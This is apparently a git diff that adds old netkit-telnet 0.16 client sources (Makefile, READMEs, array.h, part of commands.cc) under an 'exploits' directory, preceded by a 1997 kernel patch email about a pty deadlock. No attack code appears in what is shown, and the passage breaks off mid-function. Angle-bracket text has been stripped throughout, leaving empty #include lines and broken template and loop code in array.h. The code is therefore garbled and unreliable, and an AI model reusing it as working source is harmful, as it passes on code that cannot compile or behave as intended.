N_TTY line discipline select() calls the pty driver's +chars_in_buffer() function to see how many characters are buffered. +If there are more than 256, the caller has to wait. + +The pty driver.chars_in_buffer calls the other side's ldisc +chars_in_buffer() function. Here's where the problem arises: the slave +pty is in canonical mode, so that no characters can be read until a +newline is entered. But the n_tty_chars_in_buffer was returning the +full number of characters entered, even if no newline had been entered. +Hence after 256 characters were typed, select() makes telnetd wait, and +the newline can never arrive. + +The patch corrects n_tty_chars_in_buffer() by checking for canonical +mode and returning 0 if no data is available to be read. + +I've tested this on 2.0.30, and it should apply to 2.1.40 as well. +Please check it out and forward it as you see wish. + +I'm working on a patch for pty.c to allow a greater amount of type-ahead +while still avoiding a deadlock. + +Regards, +Bill Hawes +--------------B47A35BD86775A5D9DA0F308 +Content-Type: text/plain; charset=us-ascii; name="n_tty-chars-patch" +Content-Transfer-Encoding: 7bit +Content-Disposition: inline; filename="n_tty-chars-patch" + +--- drivers/char/n_tty.c.old Mon Sep 2 08:18:26 1996 ++++ drivers/char/n_tty.c Sun May 25 10:10:29 1997 +@@ -86,10 +86,31 @@ + + /* + * Return number of characters buffered to be delivered to user ++ * WSH 05/20/97: Added check for canonical mode ++ * In canonical mode, no characters are available to be read until ++ * the first newline has been entered. (Any characters in the buffer ++ * may yet be erased ...) ++ * ++ * This was causing a deadlock in telnetd: select() thought the buffer ++ * was already too full, so telnetd couldn't send a newline, but the ++ * slave PTY couldn't read anything because there was no newline. + */ + int n_tty_chars_in_buffer(struct tty_struct *tty) + { +- return tty->read_cnt; ++ /* Check first for canonical mode ... */ ++ if (tty->icanon) { ++ if (!tty->canon_data) return 0; ++ ++ /* Would prefer to just fall through and return the true ++ * count, but that could still cause deadlocks until some ++ * other routines are patched. For now, calculate the ++ * characters actually available for reading. ++ */ ++ return (tty->canon_head > tty->read_tail) ? ++ tty->canon_head - tty->read_tail : ++ tty->canon_head + (N_TTY_BUF_SIZE - tty->read_tail); ++ } ++ return tty->read_cnt; /* all characters available */ + } + + /* + +--------------B47A35BD86775A5D9DA0F308-- + + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile new file mode 100644 index 0000000..cef866f --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile @@ -0,0 +1,30 @@ +all: telnet + +include ../MCONFIG +include ../MRULES + +#CXXFLAGS:=$(patsubst -O2, -g, $(CXXFLAGS)) + +# -DAUTHENTICATE +CXXFLAGS += -DUSE_TERMIO -DKLUDGELINEMODE +LIBS += $(LIBTERMCAP) + +SRCS = commands.cc main.cc network.cc ring.cc sys_bsd.cc telnet.cc \ + terminal.cc tn3270.cc utilities.cc genget.cc environ.cc netlink.cc + +OBJS = $(patsubst %.cc, %.o, $(SRCS)) + +telnet: $(OBJS) + $(CXX) $(LDFLAGS) $^ $(LIBS) -o $@ + +include depend.mk +depend: + $(CXX) $(CXXFLAGS) -MM $(SRCS) >depend.mk + +install: telnet + install -s -m$(BINMODE) telnet $(INSTALLROOT)$(BINDIR) + install -m$(MANMODE) telnet.1 $(INSTALLROOT)$(MANDIR)/man1 + +clean: + rm -f *.o telnet + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch new file mode 100644 index 0000000..892423b --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch @@ -0,0 +1,27 @@ +diff -ur NetKit-B-0.06.orig/telnet/defines.h NetKit-B-0.06/telnet/defines.h +--- NetKit-B-0.06.orig/telnet/defines.h Fri Dec 17 07:18:16 1993 ++++ NetKit-B-0.06/telnet/defines.h Mon Jun 5 15:34:51 1995 +@@ -34,6 +34,10 @@ + * $Id: NetKit-B-0.06-telnet.patch,v 1.1 1996/07/16 05:17:22 dholland Exp $ + */ + ++#define ENV_VAR NEW_ENV_VAR ++#define ENV_VALUE NEW_ENV_VALUE ++#define TELOPT_ENVIRON TELOPT_NEW_ENVIRON ++ + #define settimer(x) clocks.x = clocks.system++ + + #if !defined(TN3270) +diff -ur NetKit-B-0.06.orig/telnetd/defs.h NetKit-B-0.06/telnetd/defs.h +--- NetKit-B-0.06.orig/telnetd/defs.h Mon May 23 09:11:57 1994 ++++ NetKit-B-0.06/telnetd/defs.h Mon Jun 5 15:34:39 1995 +@@ -40,6 +40,9 @@ + #include + #include + ++#define ENV_VAR NEW_ENV_VAR ++#define ENV_VALUE NEW_ENV_VALUE ++#define TELOPT_ENVIRON TELOPT_NEW_ENVIRON + + #ifndef BSD + # define BSD 43 diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README new file mode 100644 index 0000000..cd18f9a --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README @@ -0,0 +1,26 @@ + +Telnet has been massively hacked up for this release. + +It presently requires a C++ compiler (gcc 2.7.2 or higher +recommended), but not libg++ or libstdc++. That is, unless you went to +special effort to not install the C++ compiler when you installed gcc, +you'll be fine. + +Large amounts of further hacking are expected. If you're interested in +working on it, please contact me, as diffs are likely to become +useless very quickly. + +Support for assorted old/broken systems has been dropped. Some such +support may be reinstated in the future once the code has been cleaned +up sufficiently. On the other hand, it may not. + +Known bugs/shortcomings at this point: + + - Under some circumstances it can theoretically encounter a + buffer overflow condition and drop data on the floor. If + anyone actually observes this ``in the wild'' I'd appreciate + knowing the circumstances. I'm also not convinced the old + behavior was any better. + - Various of the debug/trace modes don't work. This probably + doesn't matter to anyone not actually coding on it. + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old new file mode 100644 index 0000000..086c88f --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old @@ -0,0 +1,566 @@ + + +This is a distribution of both client and server telnet. These programs +have been compiled on: + telnet telnetd + BSD 4.3 Reno X X + UNICOS 5.1 X X + UNICOS 6.0 X X + UNICOS 6.1 X X + UNICOS 7.0 X X + SunOs 3.5 X X (no linemode in server) + SunOs 4.1 X X (no linemode in server) + DYNIX V3.0.17.9 X X (no linemode in server) + Ultrix 3.1 X X (no linemode in server) + Ultrix 4.0 X X (no linemode in server) + +In addition, previous versions have been compiled on the following +machines, but were not available for testing this version. + telnet telnetd + SunOs 4.0.3c X X (no linemode in server) + BSD 4.3 X X (no linemode in server) + DYNIX V3.0.12 X X (no linemode in server) + +Februrary 22, 1991: + + Features: + + This version of telnet/telnetd has support for both + the AUTHENTICATION and ENCRYPTION options. The + AUTHENTICATION option is fairly well defined, and + an option number has been assigned to it. The + ENCRYPTION option is still in a state of flux; an + option number has NOT been assigned to it yet. + The code is provided in this release for experimental + and testing purposes. + + The telnet "send" command can now be used to send + do/dont/will/wont commands, with any telnet option + name. The rules for when do/dont/will/wont are sent + are still followed, so just because the user requests + that one of these be sent doesn't mean that it will + be sent... + + The telnet "getstatus" command no longer requires + that option printing be enabled to see the response + to the "DO STATUS" command. + + A -n flag has been added to telnetd to disable + keepalives. + + A new telnet command, "auth" has been added (if + AUTHENTICATE is defined). It has four sub-commands, + "status", "debug", "disable", "enable" and "help". + + A new telnet command, "encrypt" has been added (if + ENCRYPT is defined). It has many sub-commands: + "enable", "type", "start", "stop", "input", + "-input", "output", "-output", "status", "auto", + "verbose", "debug", and "help". + + An "rlogin" interface has been added. If the program + is named "rlogin", or the "-r" flag is given, then + an rlogin type of interface will be used. + ~. Terminates the session + ~ Suspend the session + ~^] Escape to telnet command mode + ~~ Pass through the ~. + BUG: If you type the rlogin escape character + in the middle of a line while in rlogin + mode, you cannot erase it or any characters + before it. Hopefully this can be fixed + in a future release... + + General changes: + + A "libtelnet.a" has now been created. This libraray + contains code that is common to both telnet and + telnetd. This is also where library routines that + are needed, but are not in the standard C library, + are placed. + + The makefiles have been re-done. All of the site + specific configuration information has now been put + into a single "Config.generic" file, in the top level + directory. Changing this one file will take care of + all three subdirectories. Also, to add a new/local + definition, a "Config.local" file may be created + at the top level; if that file exists, the subdirectories + will use that file instead of "Config.generic". + + Many 1-2 line functions in commands.c have been + removed, and just inserted in-line, or replaced + with a macro. + + Bug Fixes: + + The non-termio code in both telnet and telnetd was + setting/clearing CTLECH in the sg_flags word. This + was incorrect, and has been changed to set/clear the + LCTLECH bit in the local mode word. + + The SRCRT #define has been removed. If IP_OPTIONS + and IPPROTO_IP are defined on the system, then the + source route code is automatically enabled. + + The NO_GETTYTAB #define has been removed; there + is a compatability routine that can be built into + libtelnet to achive the same results. + + The server, telnetd, has been switched to use getopt() + for parsing the argument list. + + The code for getting the input/output speeds via + cfgetispeed()/cfgetospeed() was still not quite + right in telnet. Posix says if the ispeed is 0, + then it is really equal to the ospeed. + + The suboption processing code in telnet now has + explicit checks to make sure that we received + the entire suboption (telnetd was already doing this). + + The telnet code for processing the terminal type + could cause a core dump if an existing connection + was closed, and a new connection opened without + exiting telnet. + + Telnetd was doing a TCSADRAIN when setting the new + terminal settings; This is not good, because it means + that the tcsetattr() will hang waiting for output to + drain, and telnetd is the only one that will drain + the output... The fix is to use TCSANOW which does + not wait. + + Telnetd was improperly setting/clearing the ISTRIP + flag in the c_lflag field, it should be using the + c_iflag field. + + When the child process of telnetd was opening the + slave side of the pty, it was re-setting the EXTPROC + bit too early, and some of the other initialization + code was wiping it out. This would cause telnetd + to go out of linemode and into single character mode. + + One instance of leaving linemode in telnetd forgot + to send a WILL ECHO to the client, the net result + would be that the user would see double character + echo. + + If the MODE was being changed several times very + quickly, telnetd could get out of sync with the + state changes and the returning acks; and wind up + being left in the wrong state. + +September 14, 1990: + + Switch the client to use getopt() for parsing the + argument list. The 4.3Reno getopt.c is included for + systems that don't have getopt(). + + Use the posix _POSIX_VDISABLE value for what value + to use when disabling special characters. If this + is undefined, it defaults to 0x3ff. + + For non-termio systems, TIOCSETP was being used to + change the state of the terminal. This causes the + input queue to be flushed, which we don't want. This + is now changed to TIOCSETN. + + Take out the "#ifdef notdef" around the code in the + server that generates a "sync" when the pty oputput + is flushed. The potential problem is that some older + telnet clients may go into an infinate loop when they + receive a "sync", if so, the server can be compiled + with "NO_URGENT" defined. + + Fix the client where it was setting/clearing the OPOST + bit in the c_lflag field, not the c_oflag field. + + Fix the client where it was setting/clearing the ISTRIP + bit in the c_lflag field, not the c_iflag field. (On + 4.3Reno, this is the ECHOPRT bit in the c_lflag field.) + The client also had its interpretation of WILL BINARY + and DO BINARY reversed. + + Fix a bug in client that would cause a core dump when + attempting to remove the last environment variable. + + In the client, there were a few places were switch() + was being passed a character, and if it was a negative + value, it could get sign extended, and not match + the 8 bit case statements. The fix is to and the + switch value with 0xff. + + Add a couple more printoption() calls in the client, I + don't think there are any more places were a telnet + command can be received and not printed out when + "options" is on. + + A new flag has been added to the client, "-a". Currently, + this just causes the USER name to be sent across, in + the future this may be used to signify that automatic + authentication is requested. + + The USER variable is now only sent by the client if + the "-a" or "-l user" options are explicity used, or + if the user explicitly asks for the "USER" environment + variable to be exported. In the server, if it receives + the "USER" environment variable, it won't print out the + banner message, so that only "Password:" will be printed. + This makes the symantics more like rlogin, and should be + more familiar to the user. (People are not used to + getting a banner message, and then getting just a + "Password:" prompt.) + + Re-vamp the code for starting up the child login + process. The code was getting ugly, and it was + hard to tell what was really going on. What we + do now is after the fork(), in the child: + 1) make sure we have no controlling tty + 2) open and initialize the tty + 3) do a setsid()/setpgrp() + 4) makes the tty our controlling tty. + On some systems, #2 makes the tty our controlling + tty, and #4 is a no-op. The parent process does + a gets rid of any controlling tty after the child + is fork()ed. + + Use the strdup() library routine in telnet, instead + of the local savestr() routine. If you don't have + strdup(), you need to define NO_STRDUP. + + Add support for ^T (SIGINFO/VSTATUS), found in the + 4.3Reno distribution. This maps to the AYT character. + You need a 4-line bugfix in the kernel to get this + to work properly: + + > *** tty_pty.c.ORG Tue Sep 11 09:41:53 1990 + > --- tty_pty.c Tue Sep 11 17:48:03 1990 + > *************** + > *** 609,613 **** + > if ((tp->t_lflag&NOFLSH) == 0) + > ttyflush(tp, FREAD|FWRITE); + > ! pgsignal(tp->t_pgrp, *(unsigned int *)data); + > return(0); + > } + > --- 609,616 ---- + > if ((tp->t_lflag&NOFLSH) == 0) + > ttyflush(tp, FREAD|FWRITE); + > ! pgsignal(tp->t_pgrp, *(unsigned int *)data, 1); + > ! if ((*(unsigned int *)data == SIGINFO) && + > ! ((tp->t_lflag&NOKERNINFO) == 0)) + > ! ttyinfo(tp); + > return(0); + > } + + The client is now smarter when setting the telnet escape + character; it only sets it to one of VEOL and VEOL2 if + one of them is undefined, and the other one is not already + defined to the telnet escape character. + + Handle TERMIOS systems that have seperate input and output + line speed settings imbedded in the flags. + + Many other minor bug fixes. + +June 20, 1990: + Re-organize makefiles and source tree. The telnet/Source + directory is now gone, and all the source that was in + telnet/Source is now just in the telnet directory. + + Seperate makefile for each system are now gone. There + are two makefiles, Makefile and Makefile.generic. + The "Makefile" has the definitions for the various + system, and "Makefile.generic" does all the work. + There is a variable called "WHAT" that is used to + specify what to make. For example, in the telnet + directory, you might say: + make 4.4bsd WHAT=clean + to clean out the directory. + + Add support for the ENVIRON and XDISPLOC options. + In order for the server to work, login has to have + the "-p" option to preserve environment variables. + + Add the SOFT_TAB and LIT_ECHO modes in the LINEMODE support. + + Add the "-l user" option to command line and open command + (This is passed through the ENVIRON option). + + Add the "-e" command line option, for setting the escape + character. + + Add the "-D", diagnostic, option to the server. This allows + the server to print out debug information, which is very + useful when trying to debug a telnet that doesn't have any + debugging ability. + + Turn off the literal next character when not in LINEMODE. + + Don't recognize ^Y locally, just pass it through. + + Make minor modifications for Sun4.0 and Sun4.1 + + Add support for both FORW1 and FORW2 characters. The + telnet escpape character is set to whichever of the + two is not being used. If both are in use, the escape + character is not set, so when in linemode the user will + have to follow the escape character with a or + + +The following TELNET options are supported: + + LINEMODE: + The LINEMODE option is supported as per RFC1116. The + FORWARDMASK option is not currently supported. + + BINARY: The client has the ability to turn on/off the BINARY + option in each direction. Turning on BINARY from + server to client causes the LITOUT bit to get set in + the terminal driver on both ends, turning on BINARY + from the client to the server causes the PASS8 bit + to get set in the terminal driver on both ends. + + TERMINAL-TYPE: + This is supported as per RFC1091. On the server side, + when a terminal type is received, termcap/terminfo + is consulted to determine if it is a known terminal + type. It keeps requesting terminal types until it + gets one that it recongnizes, or hits the end of the + list. The server side looks up the entry in the + termcap/terminfo data base, and generates a list of + names which it then passes one at a time to each + request for a terminal type, duplicating the last + entry in the list before cycling back to the beginning. + + NAWS: The Negotiate about Window Size, as per RFC 1073. + + TERMINAL-SPEED: + Implemented as per RFC 1079 + + TOGGLE-FLOW-CONTROL: + Implemented as per RFC 1080 + + TIMING-MARK: + As per RFC 860 + + SGA: As per RFC 858 + + ECHO: As per RFC 857 + + STATUS: + The server will send its current status upon + request. It does not ask for the clients status. + The client will request the servers current status + from the "send getstatus" command. + + ENVIRON: + This option is currently being defined by the IETF + Telnet Working Group, and an RFC has not yet been + issued, but should be in the near future... + + X-DISPLAY-LOCATION: + This functionality can be done through the ENVIRON + option, it is added here for completeness. + + AUTHENTICATION: + This option is currently being defined by the IETF + Telnet Working Group, and an RFC has not yet been + issued. The basic framework is pretty much decided, + but the definitions for the specific authentication + schemes is still in a state of flux. + + ENCRYPT: + This option is currently being defined by the IETF + Telnet Working Group, and an RFC has not yet been + issued. The draft RFC is still in a state of flux, + so this code may change in the future. diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO new file mode 100644 index 0000000..f67f253 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO @@ -0,0 +1,13 @@ +eliminate global variables + clean up command processing + fix "send" command + clean up option processing + +add empty encrypt hooks (layer over ring buffers) +flushout --> use nullsink + +fix ring buffer so it allocates more buf instead of overflowing + +put tracing back in + +authentication? diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h new file mode 100644 index 0000000..56f1123 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h @@ -0,0 +1,97 @@ +// +// File: array.h +// Date: 16-Jul-95 +// Description: array template +// +/* + * Copyright (c) 1995 David A. Holland. + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * 3. Neither the name of the Author nor the names of any contributors + * may be used to endorse or promote products derived from this software + * without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + */ + +#ifndef ARRAY_H +#define ARRAY_H + +#ifndef assert +#include +#endif + +#ifndef NULL +#define NULL 0 +#endif + +inline void *operator new(size_t, void *v) { return v; } + +template +class array { + protected: + T *v; + int n, max; + + void reallocto(int newsize) { + while (maxmax) reallocto(newsize); + if (newsize>n) { + // call default constructors + for (int i=n; i=0 && ix +#include +#include +#include + +#include "ring.h" +#include "externs.h" +#include "defines.h" +#include "types.h" +#include "proto.h" + + int +net_write(str, len) + unsigned char *str; + int len; +{ + if (NETROOM() > len) { + netoring.supply_data(str, len); + if (str[0] == IAC && str[1] == SE) + printsub('>', &str[2], len-2); + return(len); + } + return(0); +} + + void +net_encrypt() +{ +#if defined(ENCRYPT) + if (encrypt_output) + ring_encrypt(&netoring, encrypt_output); + else + ring_clearto(&netoring); +#endif +} + + int +telnet_spin() +{ + return(-1); +} + + char * +telnet_getenv(val) + char *val; +{ + return((char *)env_getvalue((unsigned char *)val)); +} + + char * +telnet_gets(prompt, result, length, echo) + char *prompt; + char *result; + int length; + int echo; +{ + extern char *getpass(); + extern int globalmode; + int om = globalmode; + char *res; + + TerminalNewMode(-1); + if (echo) { + printf("%s", prompt); + res = fgets(result, length, stdin); + } + else if ((res = getpass(prompt))!=NULL) { + strncpy(result, res, length); + res = result; + } + TerminalNewMode(om); + return(res); +} +#endif diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc new file mode 100644 index 0000000..b3a2a3c --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc @@ -0,0 +1,2233 @@ +/* + * Copyright (c) 1988, 1990 Regents of the University of California. + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * 3. All advertising materials mentioning features or use of this software + * must display the following acknowledgement: + * This product includes software developed by the University of + * California, Berkeley and its contributors. + * 4. Neither the name of the University nor the names of its contributors + * may be used to endorse or promote products derived from this software + * without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + */ + +/* + * From: @(#)commands.c 5.5 (Berkeley) 3/22/91 + */ +char cmd_rcsid[] = + "$Id: commands.cc,v 1.32 1999/09/28 16:29:24 dholland Exp $"; + +#include + +#include +#include +#include +#include +#include +#include + +#ifdef CRAY +#include +#endif /* CRAY */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "ring.h" + +#include "externs.h" +#include "defines.h" +#include "types.h" +#include "genget.h" +#include "environ.h" +#include "proto.h" +#include "ptrarray.h" +#include "netlink.h" + +#ifdef __linux__ +#define HAS_IPPROTO_IP +#endif + +#ifdef IPPROTO_IP +#define HAS_IPPROTO_IP +#endif + +#ifndef CRAY +#if (defined(vax) || defined(tahoe) || defined(hp300)) && !defined(ultrix) +#include +#endif /* vax */ +#endif /* CRAY */ + +#define HELPINDENT ((int) sizeof ("connect")) + +#if defined(HAS_IPPROTO_IP) && defined(IP_TOS) +int tos = -1; +#endif /* defined(HAS_IPPROTO_IP) && defined(IP_TOS) */ + +static unsigned long sourceroute(char *arg, char **cpp, int *lenp); + + +char *hostname; +static char *_hostname; + +//typedef int (*intrtn_t)(int argc, const char *argv[]); + +class command_entry; +typedef ptrarray command_table; + +static int process_command(command_table *tab, int argc, const char **argv); + + +class command_entry { + protected: + const char *name; /* command name */ + const char *help; /* help string (NULL for no help) */ + + int nargs; + union { /* routine which executes command */ + command_table *subhandler; + int (*handlern)(int, const char **); + int (*handler0)(void); + int (*handler1)(const char *); + int (*handler2)(const char *, const char *); + }; + public: + command_entry(const char *n, const char *e, + int (*h)(int, const char **)) + { + name = n; + help = e; + nargs = -1; handlern = h; + } + command_entry(const char *n, const char *e, + int (*h)(void)) + { + name = n; + help = e; + nargs = 0; handler0 = h; + } + command_entry(const char *n, const char *e, + int (*h)(const char *)) + { + name = n; + help = e; + nargs = 1; handler1 = h; + } + command_entry(const char *n, const char *e, + int (*h)(const char *, const char *)) + { + name = n; + help = e; + nargs = 2; handler2 = h; + } + command_entry(const char *n, const char *e, command_table *sub) { + name = n; + help = e; + nargs = -2; + subhandler = sub; + } + + int call(int argc, const char *argv[]) { + assert(argc>=1); + if (nargs>=0 && argc!=nargs+1) { + fprintf(stderr, "Wrong number of arguments for command.\n"); + fprintf(stderr, "Try %s ? for help\n", argv[0]); + return 0; /* is this right? */ + } + if (nargs==-2) { + if (argc<2) { + fprintf(stderr, "`%s' requires a subcommand.\n", argv[0]); + fprintf(stderr, "Try %s ? for help\n", argv[0]); + return 0; /* is this right? */ + } + return process_command(subhandler, argc-1, argv+1); + } + else if (nargs==-1) return handlern(argc, argv); + else if (nargs==0) return handler0(); + else if (nargs==1) return handler1(argv[1]); + else if (nargs==2) return handler2(argv[1], argv[2]); + return 0; + } + + void describe() { + if (help) printf("%-*s\t%s\n", HELPINDENT, name, help); + } + void gethelp() { + if (help) printf("%s\n", help); + else printf("No help available\n"); + } + + const char *getname() const { return name; } +}; + +static char line[256]; +static char saveline[256]; +static int margc; +static const char *margv[20]; + +static void makeargv(void) { + register char *cp, *cp2, c; + register const char **argp = margv; + + margc = 0; + cp = line; + if (*cp == '!') { /* Special case shell escape */ + strcpy(saveline, line); /* save for shell command */ + *argp++ = "!"; /* No room in string to get this */ + margc++; + cp++; + } + while ((c = *cp)!=0) { + register int inquote = 0; + while (isspace(c)) + c = *++cp; + if (c == '\0') + break; + *argp++ = cp; + margc += 1; + for (cp2 = cp; c != '\0'; c = *++cp) { + if (inquote) { + if (c == inquote) { + inquote = 0; + continue; + } + } else { + if (c == '\\') { + if ((c = *++cp) == '\0') + break; + } else if (c == '"') { + inquote = '"'; + continue; + } else if (c == '\'') { + inquote = '\''; + continue; + } else if (isspace(c)) + break; + } + *cp2++ = c; + } + *cp2 = '\0'; + if (c == '\0') + break; + cp++; + } + *argp++ = 0; +} + +/* + * Make a character string into a number. + * + * Todo: 1. Could take random integers (12, 0x12, 012, 0b1). + */ + +static int special(const char *s) { + char c; + char b; + + switch (*s) { + case '^': + b = *++s; + if (b == '?') { + c = b | 0x40; /* DEL */ + } + else { + c = b & 0x1f; + } + break; + default: + c = *s; + break; + } + return c; +} + +/* + * Construct a control character sequence + * for a special character. + */ +static const char *control(cc_t c) +{ + static char buf[5]; + /* + * The only way I could get the Sun 3.5 compiler + * to shut up about + * if ((unsigned int)c >= 0x80) + * was to assign "c" to an unsigned int variable... + * Arggg.... + */ + register unsigned int uic = (unsigned int)c; + + if (uic == 0x7f) + return ("^?"); + if (c == (cc_t)_POSIX_VDISABLE) { + return "off"; + } + if (uic >= 0x80) { + buf[0] = '\\'; + buf[1] = ((c>>6)&07) + '0'; + buf[2] = ((c>>3)&07) + '0'; + buf[3] = (c&07) + '0'; + buf[4] = 0; + } else if (uic >= 0x20) { + buf[0] = c; + buf[1] = 0; + } else { + buf[0] = '^'; + buf[1] = '@'+c; + buf[2] = 0; + } + return (buf); +} + + + +/* + * The following are data structures and routines for + * the "send" command. + * + */ + +struct sendlist { + const char *name; /* How user refers to it (case independent) */ + const char *help; /* Help information (0 ==> no help) */ + int needconnect; /* Need to be connected */ + int narg; /* Number of arguments */ + int (*handler)(const char *, const char *); + /* Routine to perform (for special ops) */ + int nbyte; /* Number of bytes to send this command */ + int what; /* Character to be sent (<0 ==> special) */ +}; + +static int send_esc(const char *, const char *); +static int send_help(const char *, const char *); +static int send_docmd(const char *, const char *); +static int send_dontcmd(const char *, const char *); +static int send_willcmd(const char *, const char *); +static int send_wontcmd(const char *, const char *); + +extern int send_do(int, int); +extern int send_dont(int, int); +extern int send_will(int, int); +extern int send_wont(int, int); + +static int dosynch1(const char *, const char *) { return dosynch(); } + +static struct sendlist Sendlist[] = { + { "ao", "Send Telnet Abort output", 1, 0, 0, 2, AO }, + { "ayt", "Send Telnet 'Are You There'", 1, 0, 0, 2, AYT }, + { "brk", "Send Telnet Break", 1, 0, 0, 2, BREAK }, + { "break", 0, 1, 0, 0, 2, BREAK }, + { "ec", "Send Telnet Erase Character", 1, 0, 0, 2, EC }, + { "el", "Send Telnet Erase Line", 1, 0, 0, 2, EL }, + { "escape", "Send current escape character", 1, 0, send_esc, 1, 0 }, + { "ga", "Send Telnet 'Go Ahead' sequence", 1, 0, 0, 2, GA }, + { "ip", "Send Telnet Interrupt Process", 1, 0, 0, 2, IP }, + { "intp", 0, 1, 0, 0, 2, IP }, + { "interrupt", 0, 1, 0, 0, 2, IP }, + { "intr", 0, 1, 0, 0, 2, IP }, + { "nop", "Send Telnet 'No operation'", 1, 0, 0, 2, NOP }, + { "eor", "Send Telnet 'End of Record'", 1, 0, 0, 2, EOR }, + { "abort", "Send Telnet 'Abort Process'", 1, 0, 0, 2, ABORT }, + { "susp", "Send Telnet 'Suspend Process'", 1, 0, 0, 2, SUSP }, + { "eof", "Send Telnet End of File Character", 1, 0, 0, 2, xEOF }, + { "synch", "Perform Telnet 'Synch operation'", 1, 0, dosynch1, 2, 0 }, + { "getstatus", "Send request for STATUS", 1, 0, get_status, 6, 0 }, + { "?", "Display send options", 0, 0, send_help, 0, 0 }, + { "help", 0, 0, 0, send_help, 0, 0 }, + { "do", 0, 0, 1, send_docmd, 3, 0 }, + { "dont", 0, 0, 1, send_dontcmd, 3, 0 }, + { "will", 0, 0, 1, send_willcmd, 3, 0 }, + { "wont", 0, 0, 1, send_wontcmd, 3, 0 }, + { 0, 0, 0, 0, 0, 0, 0 } +}; + +#define GETSEND(name) ((struct sendlist *) genget(name, (char **) Sendlist, \ + sizeof(struct sendlist))) + +static int sendcmd(int argc, const char *argv[]) { + int count; /* how many bytes we are going to need to send */ + int i; +/* int question = 0;*/ /* was at least one argument a question */ + struct sendlist *s; /* pointer to current command */ + int success = 0; + int needconnect = 0; + + if (argc < 2) { + printf("need at least one argument for 'send' command\n"); + printf("'send ?' for help\n"); + return 0; + } + /* + * First, validate all the send arguments. + * In addition, we see how much space we are going to need, and + * whether or not we will be doing a "SYNCH" operation (which + * flushes the network queue). + */ + count = 0; + for (i = 1; i < argc; i++) { + s = GETSEND(argv[i]); + if (s == 0) { + printf("Unknown send argument '%s'\n'send ?' for help.\n", + argv[i]); + return 0; + } + else if (s == AMBIGUOUS) { + printf("Ambiguous send argument '%s'\n'send ?' for help.\n", + argv[i]); + return 0; + } + if (i + s->narg >= argc) { + fprintf(stderr, + "Need %d argument%s to 'send %s' command. 'send %s ?' for help.\n", + s->narg, s->narg == 1 ? "" : "s", s->name, s->name); + return 0; + } + count += s->nbyte; + if (s->handler == send_help) { + 